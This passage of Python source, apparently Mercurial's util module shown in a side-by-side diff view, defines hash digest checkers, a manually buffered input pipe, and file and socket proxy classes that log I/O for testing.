223 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
224 >>> digester.preferred([b'md5', b'sha1'])
224 >>> digester.preferred([b'md5', b'sha1'])
225 'sha1'
225 'sha1'
226 """
226 """
227
227
228 def __init__(self, digests, s=b''):
228 def __init__(self, digests, s=b''):
229 self._hashes = {}
229 self._hashes = {}
230 for k in digests:
230 for k in digests:
231 if k not in DIGESTS:
231 if k not in DIGESTS:
232 raise error.Abort(_(b'unknown digest type: %s') % k)
232 raise error.Abort(_(b'unknown digest type: %s') % k)
233 self._hashes[k] = DIGESTS[k]()
233 self._hashes[k] = DIGESTS[k]()
234 if s:
234 if s:
235 self.update(s)
235 self.update(s)
236
236
237 def update(self, data):
237 def update(self, data):
238 for h in self._hashes.values():
238 for h in self._hashes.values():
239 h.update(data)
239 h.update(data)
240
240
241 def __getitem__(self, key):
241 def __getitem__(self, key):
242 if key not in DIGESTS:
242 if key not in DIGESTS:
243 raise error.Abort(_(b'unknown digest type: %s') % k)
243 raise error.Abort(_(b'unknown digest type: %s') % k)
244 return nodemod.hex(self._hashes[key].digest())
244 return nodemod.hex(self._hashes[key].digest())
245
245
246 def __iter__(self):
246 def __iter__(self):
247 return iter(self._hashes)
247 return iter(self._hashes)
248
248
249 @staticmethod
249 @staticmethod
250 def preferred(supported):
250 def preferred(supported):
251 """returns the strongest digest type in both supported and DIGESTS."""
251 """returns the strongest digest type in both supported and DIGESTS."""
252
252
253 for k in DIGESTS_BY_STRENGTH:
253 for k in DIGESTS_BY_STRENGTH:
254 if k in supported:
254 if k in supported:
255 return k
255 return k
256 return None
256 return None
257
257
258
258
259 class digestchecker(object):
259 class digestchecker(object):
260 """file handle wrapper that additionally checks content against a given
260 """file handle wrapper that additionally checks content against a given
261 size and digests.
261 size and digests.
262
262
263 d = digestchecker(fh, size, {'md5': '...'})
263 d = digestchecker(fh, size, {'md5': '...'})
264
264
265 When multiple digests are given, all of them are validated.
265 When multiple digests are given, all of them are validated.
266 """
266 """
267
267
268 def __init__(self, fh, size, digests):
268 def __init__(self, fh, size, digests):
269 self._fh = fh
269 self._fh = fh
270 self._size = size
270 self._size = size
271 self._got = 0
271 self._got = 0
272 self._digests = dict(digests)
272 self._digests = dict(digests)
273 self._digester = digester(self._digests.keys())
273 self._digester = digester(self._digests.keys())
274
274
275 def read(self, length=-1):
275 def read(self, length=-1):
276 content = self._fh.read(length)
276 content = self._fh.read(length)
277 self._digester.update(content)
277 self._digester.update(content)
278 self._got += len(content)
278 self._got += len(content)
279 return content
279 return content
280
280
281 def validate(self):
281 def validate(self):
282 if self._size != self._got:
282 if self._size != self._got:
283 raise error.Abort(
283 raise error.Abort(
284 _(b'size mismatch: expected %d, got %d')
284 _(b'size mismatch: expected %d, got %d')
285 % (self._size, self._got)
285 % (self._size, self._got)
286 )
286 )
287 for k, v in self._digests.items():
287 for k, v in self._digests.items():
288 if v != self._digester[k]:
288 if v != self._digester[k]:
289 # i18n: first parameter is a digest name
289 # i18n: first parameter is a digest name
290 raise error.Abort(
290 raise error.Abort(
291 _(b'%s mismatch: expected %s, got %s')
291 _(b'%s mismatch: expected %s, got %s')
292 % (k, v, self._digester[k])
292 % (k, v, self._digester[k])
293 )
293 )
294
294
295
295
296 try:
296 try:
297 buffer = buffer
297 buffer = buffer
298 except NameError:
298 except NameError:
299
299
300 def buffer(sliceable, offset=0, length=None):
300 def buffer(sliceable, offset=0, length=None):
301 if length is not None:
301 if length is not None:
302 return memoryview(sliceable)[offset : offset + length]
302 return memoryview(sliceable)[offset : offset + length]
303 return memoryview(sliceable)[offset:]
303 return memoryview(sliceable)[offset:]
304
304
305
305
306 _chunksize = 4096
306 _chunksize = 4096
307
307
308
308
309 class bufferedinputpipe(object):
309 class bufferedinputpipe(object):
310 """a manually buffered input pipe
310 """a manually buffered input pipe
311
311
312 Python will not let us use buffered IO and lazy reading with 'polling' at
312 Python will not let us use buffered IO and lazy reading with 'polling' at
313 the same time. We cannot probe the buffer state and select will not detect
313 the same time. We cannot probe the buffer state and select will not detect
314 that data are ready to read if they are already buffered.
314 that data are ready to read if they are already buffered.
315
315
316 This class let us work around that by implementing its own buffering
316 This class let us work around that by implementing its own buffering
317 (allowing efficient readline) while offering a way to know if the buffer is
317 (allowing efficient readline) while offering a way to know if the buffer is
318 empty from the output (allowing collaboration of the buffer with polling).
318 empty from the output (allowing collaboration of the buffer with polling).
319
319
320 This class lives in the 'util' module because it makes use of the 'os'
320 This class lives in the 'util' module because it makes use of the 'os'
321 module from the python stdlib.
321 module from the python stdlib.
322 """
322 """
323
323
324 def __new__(cls, fh):
324 def __new__(cls, fh):
325 # If we receive a fileobjectproxy, we need to use a variation of this
325 # If we receive a fileobjectproxy, we need to use a variation of this
326 # class that notifies observers about activity.
326 # class that notifies observers about activity.
327 if isinstance(fh, fileobjectproxy):
327 if isinstance(fh, fileobjectproxy):
328 cls = observedbufferedinputpipe
328 cls = observedbufferedinputpipe
329
329
330 return super(bufferedinputpipe, cls).__new__(cls)
330 return super(bufferedinputpipe, cls).__new__(cls)
331
331
332 def __init__(self, input):
332 def __init__(self, input):
333 self._input = input
333 self._input = input
334 self._buffer = []
334 self._buffer = []
335 self._eof = False
335 self._eof = False
336 self._lenbuf = 0
336 self._lenbuf = 0
337
337
338 @property
338 @property
339 def hasbuffer(self):
339 def hasbuffer(self):
340 """True is any data is currently buffered
340 """True is any data is currently buffered
341
341
342 This will be used externally a pre-step for polling IO. If there is
342 This will be used externally a pre-step for polling IO. If there is
343 already data then no polling should be set in place."""
343 already data then no polling should be set in place."""
344 return bool(self._buffer)
344 return bool(self._buffer)
345
345
346 @property
346 @property
347 def closed(self):
347 def closed(self):
348 return self._input.closed
348 return self._input.closed
349
349
350 def fileno(self):
350 def fileno(self):
351 return self._input.fileno()
351 return self._input.fileno()
352
352
353 def close(self):
353 def close(self):
354 return self._input.close()
354 return self._input.close()
355
355
356 def read(self, size):
356 def read(self, size):
357 while (not self._eof) and (self._lenbuf < size):
357 while (not self._eof) and (self._lenbuf < size):
358 self._fillbuffer()
358 self._fillbuffer()
359 return self._frombuffer(size)
359 return self._frombuffer(size)
360
360
361 def unbufferedread(self, size):
361 def unbufferedread(self, size):
362 if not self._eof and self._lenbuf == 0:
362 if not self._eof and self._lenbuf == 0:
363 self._fillbuffer(max(size, _chunksize))
363 self._fillbuffer(max(size, _chunksize))
364 return self._frombuffer(min(self._lenbuf, size))
364 return self._frombuffer(min(self._lenbuf, size))
365
365
366 def readline(self, *args, **kwargs):
366 def readline(self, *args, **kwargs):
367 if len(self._buffer) > 1:
367 if len(self._buffer) > 1:
368 # this should not happen because both read and readline end with a
368 # this should not happen because both read and readline end with a
369 # _frombuffer call that collapse it.
369 # _frombuffer call that collapse it.
370 self._buffer = [b''.join(self._buffer)]
370 self._buffer = [b''.join(self._buffer)]
371 self._lenbuf = len(self._buffer[0])
371 self._lenbuf = len(self._buffer[0])
372 lfi = -1
372 lfi = -1
373 if self._buffer:
373 if self._buffer:
374 lfi = self._buffer[-1].find(b'\n')
374 lfi = self._buffer[-1].find(b'\n')
375 while (not self._eof) and lfi < 0:
375 while (not self._eof) and lfi < 0:
376 self._fillbuffer()
376 self._fillbuffer()
377 if self._buffer:
377 if self._buffer:
378 lfi = self._buffer[-1].find(b'\n')
378 lfi = self._buffer[-1].find(b'\n')
379 size = lfi + 1
379 size = lfi + 1
380 if lfi < 0: # end of file
380 if lfi < 0: # end of file
381 size = self._lenbuf
381 size = self._lenbuf
382 elif len(self._buffer) > 1:
382 elif len(self._buffer) > 1:
383 # we need to take previous chunks into account
383 # we need to take previous chunks into account
384 size += self._lenbuf - len(self._buffer[-1])
384 size += self._lenbuf - len(self._buffer[-1])
385 return self._frombuffer(size)
385 return self._frombuffer(size)
386
386
387 def _frombuffer(self, size):
387 def _frombuffer(self, size):
388 """return at most 'size' data from the buffer
388 """return at most 'size' data from the buffer
389
389
390 The data are removed from the buffer."""
390 The data are removed from the buffer."""
391 if size == 0 or not self._buffer:
391 if size == 0 or not self._buffer:
392 return b''
392 return b''
393 buf = self._buffer[0]
393 buf = self._buffer[0]
394 if len(self._buffer) > 1:
394 if len(self._buffer) > 1:
395 buf = b''.join(self._buffer)
395 buf = b''.join(self._buffer)
396
396
397 data = buf[:size]
397 data = buf[:size]
398 buf = buf[len(data) :]
398 buf = buf[len(data) :]
399 if buf:
399 if buf:
400 self._buffer = [buf]
400 self._buffer = [buf]
401 self._lenbuf = len(buf)
401 self._lenbuf = len(buf)
402 else:
402 else:
403 self._buffer = []
403 self._buffer = []
404 self._lenbuf = 0
404 self._lenbuf = 0
405 return data
405 return data
406
406
407 def _fillbuffer(self, size=_chunksize):
407 def _fillbuffer(self, size=_chunksize):
408 """read data to the buffer"""
408 """read data to the buffer"""
409 data = os.read(self._input.fileno(), size)
409 data = os.read(self._input.fileno(), size)
410 if not data:
410 if not data:
411 self._eof = True
411 self._eof = True
412 else:
412 else:
413 self._lenbuf += len(data)
413 self._lenbuf += len(data)
414 self._buffer.append(data)
414 self._buffer.append(data)
415
415
416 return data
416 return data
417
417
418
418
419 def mmapread(fp, size=None):
419 def mmapread(fp, size=None):
420 if size == 0:
420 if size == 0:
421 # size of 0 to mmap.mmap() means "all data"
421 # size of 0 to mmap.mmap() means "all data"
422 # rather than "zero bytes", so special case that.
422 # rather than "zero bytes", so special case that.
423 return b''
423 return b''
424 elif size is None:
424 elif size is None:
425 size = 0
425 size = 0
426 try:
426 try:
427 fd = getattr(fp, 'fileno', lambda: fp)()
427 fd = getattr(fp, 'fileno', lambda: fp)()
428 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
428 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
429 except ValueError:
429 except ValueError:
430 # Empty files cannot be mmapped, but mmapread should still work. Check
430 # Empty files cannot be mmapped, but mmapread should still work. Check
431 # if the file is empty, and if so, return an empty buffer.
431 # if the file is empty, and if so, return an empty buffer.
432 if os.fstat(fd).st_size == 0:
432 if os.fstat(fd).st_size == 0:
433 return b''
433 return b''
434 raise
434 raise
435
435
436
436
437 class fileobjectproxy(object):
437 class fileobjectproxy(object):
438 """A proxy around file objects that tells a watcher when events occur.
438 """A proxy around file objects that tells a watcher when events occur.
439
439
440 This type is intended to only be used for testing purposes. Think hard
440 This type is intended to only be used for testing purposes. Think hard
441 before using it in important code.
441 before using it in important code.
442 """
442 """
443
443
444 __slots__ = (
444 __slots__ = (
445 '_orig',
445 '_orig',
446 '_observer',
446 '_observer',
447 )
447 )
448
448
449 def __init__(self, fh, observer):
449 def __init__(self, fh, observer):
450 object.__setattr__(self, '_orig', fh)
450 object.__setattr__(self, '_orig', fh)
451 object.__setattr__(self, '_observer', observer)
451 object.__setattr__(self, '_observer', observer)
452
452
453 def __getattribute__(self, name):
453 def __getattribute__(self, name):
454 ours = {
454 ours = {
455 '_observer',
455 '_observer',
456 # IOBase
456 # IOBase
457 'close',
457 'close',
458 # closed if a property
458 # closed if a property
459 'fileno',
459 'fileno',
460 'flush',
460 'flush',
461 'isatty',
461 'isatty',
462 'readable',
462 'readable',
463 'readline',
463 'readline',
464 'readlines',
464 'readlines',
465 'seek',
465 'seek',
466 'seekable',
466 'seekable',
467 'tell',
467 'tell',
468 'truncate',
468 'truncate',
469 'writable',
469 'writable',
470 'writelines',
470 'writelines',
471 # RawIOBase
471 # RawIOBase
472 'read',
472 'read',
473 'readall',
473 'readall',
474 'readinto',
474 'readinto',
475 'write',
475 'write',
476 # BufferedIOBase
476 # BufferedIOBase
477 # raw is a property
477 # raw is a property
478 'detach',
478 'detach',
479 # read defined above
479 # read defined above
480 'read1',
480 'read1',
481 # readinto defined above
481 # readinto defined above
482 # write defined above
482 # write defined above
483 }
483 }
484
484
485 # We only observe some methods.
485 # We only observe some methods.
486 if name in ours:
486 if name in ours:
487 return object.__getattribute__(self, name)
487 return object.__getattribute__(self, name)
488
488
489 return getattr(object.__getattribute__(self, '_orig'), name)
489 return getattr(object.__getattribute__(self, '_orig'), name)
490
490
491 def __nonzero__(self):
491 def __nonzero__(self):
492 return bool(object.__getattribute__(self, '_orig'))
492 return bool(object.__getattribute__(self, '_orig'))
493
493
494 __bool__ = __nonzero__
494 __bool__ = __nonzero__
495
495
496 def __delattr__(self, name):
496 def __delattr__(self, name):
497 return delattr(object.__getattribute__(self, '_orig'), name)
497 return delattr(object.__getattribute__(self, '_orig'), name)
498
498
499 def __setattr__(self, name, value):
499 def __setattr__(self, name, value):
500 return setattr(object.__getattribute__(self, '_orig'), name, value)
500 return setattr(object.__getattribute__(self, '_orig'), name, value)
501
501
502 def __iter__(self):
502 def __iter__(self):
503 return object.__getattribute__(self, '_orig').__iter__()
503 return object.__getattribute__(self, '_orig').__iter__()
504
504
505 def _observedcall(self, name, *args, **kwargs):
505 def _observedcall(self, name, *args, **kwargs):
506 # Call the original object.
506 # Call the original object.
507 orig = object.__getattribute__(self, '_orig')
507 orig = object.__getattribute__(self, '_orig')
508 res = getattr(orig, name)(*args, **kwargs)
508 res = getattr(orig, name)(*args, **kwargs)
509
509
510 # Call a method on the observer of the same name with arguments
510 # Call a method on the observer of the same name with arguments
511 # so it can react, log, etc.
511 # so it can react, log, etc.
512 observer = object.__getattribute__(self, '_observer')
512 observer = object.__getattribute__(self, '_observer')
513 fn = getattr(observer, name, None)
513 fn = getattr(observer, name, None)
514 if fn:
514 if fn:
515 fn(res, *args, **kwargs)
515 fn(res, *args, **kwargs)
516
516
517 return res
517 return res
518
518
519 def close(self, *args, **kwargs):
519 def close(self, *args, **kwargs):
520 return object.__getattribute__(self, '_observedcall')(
520 return object.__getattribute__(self, '_observedcall')(
521 'close', *args, **kwargs
521 'close', *args, **kwargs
522 )
522 )
523
523
524 def fileno(self, *args, **kwargs):
524 def fileno(self, *args, **kwargs):
525 return object.__getattribute__(self, '_observedcall')(
525 return object.__getattribute__(self, '_observedcall')(
526 'fileno', *args, **kwargs
526 'fileno', *args, **kwargs
527 )
527 )
528
528
529 def flush(self, *args, **kwargs):
529 def flush(self, *args, **kwargs):
530 return object.__getattribute__(self, '_observedcall')(
530 return object.__getattribute__(self, '_observedcall')(
531 'flush', *args, **kwargs
531 'flush', *args, **kwargs
532 )
532 )
533
533
534 def isatty(self, *args, **kwargs):
534 def isatty(self, *args, **kwargs):
535 return object.__getattribute__(self, '_observedcall')(
535 return object.__getattribute__(self, '_observedcall')(
536 'isatty', *args, **kwargs
536 'isatty', *args, **kwargs
537 )
537 )
538
538
539 def readable(self, *args, **kwargs):
539 def readable(self, *args, **kwargs):
540 return object.__getattribute__(self, '_observedcall')(
540 return object.__getattribute__(self, '_observedcall')(
541 'readable', *args, **kwargs
541 'readable', *args, **kwargs
542 )
542 )
543
543
544 def readline(self, *args, **kwargs):
544 def readline(self, *args, **kwargs):
545 return object.__getattribute__(self, '_observedcall')(
545 return object.__getattribute__(self, '_observedcall')(
546 'readline', *args, **kwargs
546 'readline', *args, **kwargs
547 )
547 )
548
548
549 def readlines(self, *args, **kwargs):
549 def readlines(self, *args, **kwargs):
550 return object.__getattribute__(self, '_observedcall')(
550 return object.__getattribute__(self, '_observedcall')(
551 'readlines', *args, **kwargs
551 'readlines', *args, **kwargs
552 )
552 )
553
553
554 def seek(self, *args, **kwargs):
554 def seek(self, *args, **kwargs):
555 return object.__getattribute__(self, '_observedcall')(
555 return object.__getattribute__(self, '_observedcall')(
556 'seek', *args, **kwargs
556 'seek', *args, **kwargs
557 )
557 )
558
558
559 def seekable(self, *args, **kwargs):
559 def seekable(self, *args, **kwargs):
560 return object.__getattribute__(self, '_observedcall')(
560 return object.__getattribute__(self, '_observedcall')(
561 'seekable', *args, **kwargs
561 'seekable', *args, **kwargs
562 )
562 )
563
563
564 def tell(self, *args, **kwargs):
564 def tell(self, *args, **kwargs):
565 return object.__getattribute__(self, '_observedcall')(
565 return object.__getattribute__(self, '_observedcall')(
566 'tell', *args, **kwargs
566 'tell', *args, **kwargs
567 )
567 )
568
568
569 def truncate(self, *args, **kwargs):
569 def truncate(self, *args, **kwargs):
570 return object.__getattribute__(self, '_observedcall')(
570 return object.__getattribute__(self, '_observedcall')(
571 'truncate', *args, **kwargs
571 'truncate', *args, **kwargs
572 )
572 )
573
573
574 def writable(self, *args, **kwargs):
574 def writable(self, *args, **kwargs):
575 return object.__getattribute__(self, '_observedcall')(
575 return object.__getattribute__(self, '_observedcall')(
576 'writable', *args, **kwargs
576 'writable', *args, **kwargs
577 )
577 )
578
578
579 def writelines(self, *args, **kwargs):
579 def writelines(self, *args, **kwargs):
580 return object.__getattribute__(self, '_observedcall')(
580 return object.__getattribute__(self, '_observedcall')(
581 'writelines', *args, **kwargs
581 'writelines', *args, **kwargs
582 )
582 )
583
583
584 def read(self, *args, **kwargs):
584 def read(self, *args, **kwargs):
585 return object.__getattribute__(self, '_observedcall')(
585 return object.__getattribute__(self, '_observedcall')(
586 'read', *args, **kwargs
586 'read', *args, **kwargs
587 )
587 )
588
588
589 def readall(self, *args, **kwargs):
589 def readall(self, *args, **kwargs):
590 return object.__getattribute__(self, '_observedcall')(
590 return object.__getattribute__(self, '_observedcall')(
591 'readall', *args, **kwargs
591 'readall', *args, **kwargs
592 )
592 )
593
593
594 def readinto(self, *args, **kwargs):
594 def readinto(self, *args, **kwargs):
595 return object.__getattribute__(self, '_observedcall')(
595 return object.__getattribute__(self, '_observedcall')(
596 'readinto', *args, **kwargs
596 'readinto', *args, **kwargs
597 )
597 )
598
598
599 def write(self, *args, **kwargs):
599 def write(self, *args, **kwargs):
600 return object.__getattribute__(self, '_observedcall')(
600 return object.__getattribute__(self, '_observedcall')(
601 'write', *args, **kwargs
601 'write', *args, **kwargs
602 )
602 )
603
603
604 def detach(self, *args, **kwargs):
604 def detach(self, *args, **kwargs):
605 return object.__getattribute__(self, '_observedcall')(
605 return object.__getattribute__(self, '_observedcall')(
606 'detach', *args, **kwargs
606 'detach', *args, **kwargs
607 )
607 )
608
608
609 def read1(self, *args, **kwargs):
609 def read1(self, *args, **kwargs):
610 return object.__getattribute__(self, '_observedcall')(
610 return object.__getattribute__(self, '_observedcall')(
611 'read1', *args, **kwargs
611 'read1', *args, **kwargs
612 )
612 )
613
613
614
614
615 class observedbufferedinputpipe(bufferedinputpipe):
615 class observedbufferedinputpipe(bufferedinputpipe):
616 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
616 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
617
617
618 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
618 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
619 bypass ``fileobjectproxy``. Because of this, we need to make
619 bypass ``fileobjectproxy``. Because of this, we need to make
620 ``bufferedinputpipe`` aware of these operations.
620 ``bufferedinputpipe`` aware of these operations.
621
621
622 This variation of ``bufferedinputpipe`` can notify observers about
622 This variation of ``bufferedinputpipe`` can notify observers about
623 ``os.read()`` events. It also re-publishes other events, such as
623 ``os.read()`` events. It also re-publishes other events, such as
624 ``read()`` and ``readline()``.
624 ``read()`` and ``readline()``.
625 """
625 """
626
626
627 def _fillbuffer(self):
627 def _fillbuffer(self):
628 res = super(observedbufferedinputpipe, self)._fillbuffer()
628 res = super(observedbufferedinputpipe, self)._fillbuffer()
629
629
630 fn = getattr(self._input._observer, 'osread', None)
630 fn = getattr(self._input._observer, 'osread', None)
631 if fn:
631 if fn:
632 fn(res, _chunksize)
632 fn(res, _chunksize)
633
633
634 return res
634 return res
635
635
636 # We use different observer methods because the operation isn't
636 # We use different observer methods because the operation isn't
637 # performed on the actual file object but on us.
637 # performed on the actual file object but on us.
638 def read(self, size):
638 def read(self, size):
639 res = super(observedbufferedinputpipe, self).read(size)
639 res = super(observedbufferedinputpipe, self).read(size)
640
640
641 fn = getattr(self._input._observer, 'bufferedread', None)
641 fn = getattr(self._input._observer, 'bufferedread', None)
642 if fn:
642 if fn:
643 fn(res, size)
643 fn(res, size)
644
644
645 return res
645 return res
646
646
647 def readline(self, *args, **kwargs):
647 def readline(self, *args, **kwargs):
648 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
648 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
649
649
650 fn = getattr(self._input._observer, 'bufferedreadline', None)
650 fn = getattr(self._input._observer, 'bufferedreadline', None)
651 if fn:
651 if fn:
652 fn(res)
652 fn(res)
653
653
654 return res
654 return res
655
655
656
656
657 PROXIED_SOCKET_METHODS = {
657 PROXIED_SOCKET_METHODS = {
658 'makefile',
658 'makefile',
659 'recv',
659 'recv',
660 'recvfrom',
660 'recvfrom',
661 'recvfrom_into',
661 'recvfrom_into',
662 'recv_into',
662 'recv_into',
663 'send',
663 'send',
664 'sendall',
664 'sendall',
665 'sendto',
665 'sendto',
666 'setblocking',
666 'setblocking',
667 'settimeout',
667 'settimeout',
668 'gettimeout',
668 'gettimeout',
669 'setsockopt',
669 'setsockopt',
670 }
670 }
671
671
672
672
673 class socketproxy(object):
673 class socketproxy(object):
674 """A proxy around a socket that tells a watcher when events occur.
674 """A proxy around a socket that tells a watcher when events occur.
675
675
676 This is like ``fileobjectproxy`` except for sockets.
676 This is like ``fileobjectproxy`` except for sockets.
677
677
678 This type is intended to only be used for testing purposes. Think hard
678 This type is intended to only be used for testing purposes. Think hard
679 before using it in important code.
679 before using it in important code.
680 """
680 """
681
681
682 __slots__ = (
682 __slots__ = (
683 '_orig',
683 '_orig',
684 '_observer',
684 '_observer',
685 )
685 )
686
686
687 def __init__(self, sock, observer):
687 def __init__(self, sock, observer):
688 object.__setattr__(self, '_orig', sock)
688 object.__setattr__(self, '_orig', sock)
689 object.__setattr__(self, '_observer', observer)
689 object.__setattr__(self, '_observer', observer)
690
690
691 def __getattribute__(self, name):
691 def __getattribute__(self, name):
692 if name in PROXIED_SOCKET_METHODS:
692 if name in PROXIED_SOCKET_METHODS:
693 return object.__getattribute__(self, name)
693 return object.__getattribute__(self, name)
694
694
695 return getattr(object.__getattribute__(self, '_orig'), name)
695 return getattr(object.__getattribute__(self, '_orig'), name)
696
696
697 def __delattr__(self, name):
697 def __delattr__(self, name):
698 return delattr(object.__getattribute__(self, '_orig'), name)
698 return delattr(object.__getattribute__(self, '_orig'), name)
699
699
700 def __setattr__(self, name, value):
700 def __setattr__(self, name, value):
701 return setattr(object.__getattribute__(self, '_orig'), name, value)
701 return setattr(object.__getattribute__(self, '_orig'), name, value)
702
702
703 def __nonzero__(self):
703 def __nonzero__(self):
704 return bool(object.__getattribute__(self, '_orig'))
704 return bool(object.__getattribute__(self, '_orig'))
705
705
706 __bool__ = __nonzero__
706 __bool__ = __nonzero__
707
707
708 def _observedcall(self, name, *args, **kwargs):
708 def _observedcall(self, name, *args, **kwargs):
709 # Call the original object.
709 # Call the original object.
710 orig = object.__getattribute__(self, '_orig')
710 orig = object.__getattribute__(self, '_orig')
711 res = getattr(orig, name)(*args, **kwargs)
711 res = getattr(orig, name)(*args, **kwargs)
712
712
713 # Call a method on the observer of the same name with arguments
713 # Call a method on the observer of the same name with arguments
714 # so it can react, log, etc.
714 # so it can react, log, etc.
715 observer = object.__getattribute__(self, '_observer')
715 observer = object.__getattribute__(self, '_observer')
716 fn = getattr(observer, name, None)
716 fn = getattr(observer, name, None)
717 if fn:
717 if fn:
718 fn(res, *args, **kwargs)
718 fn(res, *args, **kwargs)
719
719
720 return res
720 return res
721
721
722 def makefile(self, *args, **kwargs):
722 def makefile(self, *args, **kwargs):
723 res = object.__getattribute__(self, '_observedcall')(
723 res = object.__getattribute__(self, '_observedcall')(
724 'makefile', *args, **kwargs
724 'makefile', *args, **kwargs
725 )
725 )
726
726
727 # The file object may be used for I/O. So we turn it into a
727 # The file object may be used for I/O. So we turn it into a
728 # proxy using our observer.
728 # proxy using our observer.
729 observer = object.__getattribute__(self, '_observer')
729 observer = object.__getattribute__(self, '_observer')
730 return makeloggingfileobject(
730 return makeloggingfileobject(
731 observer.fh,
731 observer.fh,
732 res,
732 res,
733 observer.name,
733 observer.name,
734 reads=observer.reads,
734 reads=observer.reads,
735 writes=observer.writes,
735 writes=observer.writes,
736 logdata=observer.logdata,
736 logdata=observer.logdata,
737 logdataapis=observer.logdataapis,
737 logdataapis=observer.logdataapis,
738 )
738 )
739
739
740 def recv(self, *args, **kwargs):
740 def recv(self, *args, **kwargs):
741 return object.__getattribute__(self, '_observedcall')(
741 return object.__getattribute__(self, '_observedcall')(
742 'recv', *args, **kwargs
742 'recv', *args, **kwargs
743 )
743 )
744
744
745 def recvfrom(self, *args, **kwargs):
745 def recvfrom(self, *args, **kwargs):
746 return object.__getattribute__(self, '_observedcall')(
746 return object.__getattribute__(self, '_observedcall')(
747 'recvfrom', *args, **kwargs
747 'recvfrom', *args, **kwargs
748 )
748 )
749
749
750 def recvfrom_into(self, *args, **kwargs):
750 def recvfrom_into(self, *args, **kwargs):
751 return object.__getattribute__(self, '_observedcall')(
751 return object.__getattribute__(self, '_observedcall')(
752 'recvfrom_into', *args, **kwargs
752 'recvfrom_into', *args, **kwargs
753 )
753 )
754
754
755 def recv_into(self, *args, **kwargs):
755 def recv_into(self, *args, **kwargs):
756 return object.__getattribute__(self, '_observedcall')(
756 return object.__getattribute__(self, '_observedcall')(
757 'recv_info', *args, **kwargs
757 'recv_info', *args, **kwargs
758 )
758 )
759
759
760 def send(self, *args, **kwargs):
760 def send(self, *args, **kwargs):
761 return object.__getattribute__(self, '_observedcall')(
761 return object.__getattribute__(self, '_observedcall')(
762 'send', *args, **kwargs
762 'send', *args, **kwargs
763 )
763 )
764
764
765 def sendall(self, *args, **kwargs):
765 def sendall(self, *args, **kwargs):
766 return object.__getattribute__(self, '_observedcall')(
766 return object.__getattribute__(self, '_observedcall')(
767 'sendall', *args, **kwargs
767 'sendall', *args, **kwargs
768 )
768 )
769
769
770 def sendto(self, *args, **kwargs):
770 def sendto(self, *args, **kwargs):
771 return object.__getattribute__(self, '_observedcall')(
771 return object.__getattribute__(self, '_observedcall')(
772 'sendto', *args, **kwargs
772 'sendto', *args, **kwargs
773 )
773 )
774
774
775 def setblocking(self, *args, **kwargs):
775 def setblocking(self, *args, **kwargs):
776 return object.__getattribute__(self, '_observedcall')(
776 return object.__getattribute__(self, '_observedcall')(
777 'setblocking', *args, **kwargs
777 'setblocking', *args, **kwargs
778 )
778 )
779
779
780 def settimeout(self, *args, **kwargs):
780 def settimeout(self, *args, **kwargs):
781 return object.__getattribute__(self, '_observedcall')(
781 return object.__getattribute__(self, '_observedcall')(
782 'settimeout', *args, **kwargs
782 'settimeout', *args, **kwargs
783 )
783 )
784
784
785 def gettimeout(self, *args, **kwargs):
785 def gettimeout(self, *args, **kwargs):
786 return object.__getattribute__(self, '_observedcall')(
786 return object.__getattribute__(self, '_observedcall')(
787 'gettimeout', *args, **kwargs
787 'gettimeout', *args, **kwargs
788 )
788 )
789
789
790 def setsockopt(self, *args, **kwargs):
790 def setsockopt(self, *args, **kwargs):
791 return object.__getattribute__(self, '_observedcall')(
791 return object.__getattribute__(self, '_observedcall')(
792 'setsockopt', *args, **kwargs
792 'setsockopt', *args, **kwargs
793 )
793 )
794
794
795
795
796 class baseproxyobserver(object):
796 class baseproxyobserver(object):
797 def __init__(self, fh, name, logdata, logdataapis):
797 def __init__(self, fh, name, logdata, logdataapis):
798 self.fh = fh
798 self.fh = fh
799 self.name = name
799 self.name = name
800 self.logdata = logdata
800 self.logdata = logdata
801 self.logdataapis = logdataapis
801 self.logdataapis = logdataapis
802
802
803 def _writedata(self, data):
803 def _writedata(self, data):
804 if not self.logdata:
804 if not self.logdata:
805 if self.logdataapis:
805 if self.logdataapis:
806 self.fh.write(b'\n')
806 self.fh.write(b'\n')
807 self.fh.flush()
807 self.fh.flush()
808 return
808 return
809
809
810 # Simple case writes all data on a single line.
810 # Simple case writes all data on a single line.
811 if b'\n' not in data:
811 if b'\n' not in data:
812 if self.logdataapis:
812 if self.logdataapis:
813 self.fh.write(b': %s\n' % stringutil.escapestr(data))
813 self.fh.write(b': %s\n' % stringutil.escapestr(data))
814 else:
814 else:
815 self.fh.write(
815 self.fh.write(
816 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
816 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
817 )
817 )
818 self.fh.flush()
818 self.fh.flush()
819 return
819 return
820
820
821 # Data with newlines is written to multiple lines.
821 # Data with newlines is written to multiple lines.
822 if self.logdataapis:
822 if self.logdataapis:
823 self.fh.write(b':\n')
823 self.fh.write(b':\n')
824
824
825 lines = data.splitlines(True)
825 lines = data.splitlines(True)
826 for line in lines:
826 for line in lines:
827 self.fh.write(
827 self.fh.write(
828 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
828 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
829 )
829 )
830 self.fh.flush()
830 self.fh.flush()
831
831
832
832
833 class fileobjectobserver(baseproxyobserver):
833 class fileobjectobserver(baseproxyobserver):
834 """Logs file object activity."""
834 """Logs file object activity."""
835
835
836 def __init__(
836 def __init__(
837 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
837 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
838 ):
838 ):
839 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
839 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
840 self.reads = reads
840 self.reads = reads
841 self.writes = writes
841 self.writes = writes
842
842
843 def read(self, res, size=-1):
843 def read(self, res, size=-1):
844 if not self.reads:
844 if not self.reads:
845 return
845 return
846 # Python 3 can return None from reads at EOF instead of empty strings.
846 # Python 3 can return None from reads at EOF instead of empty strings.
847 if res is None:
847 if res is None:
848 res = b''
848 res = b''
849
849
850 if size == -1 and res == b'':
850 if size == -1 and res == b'':
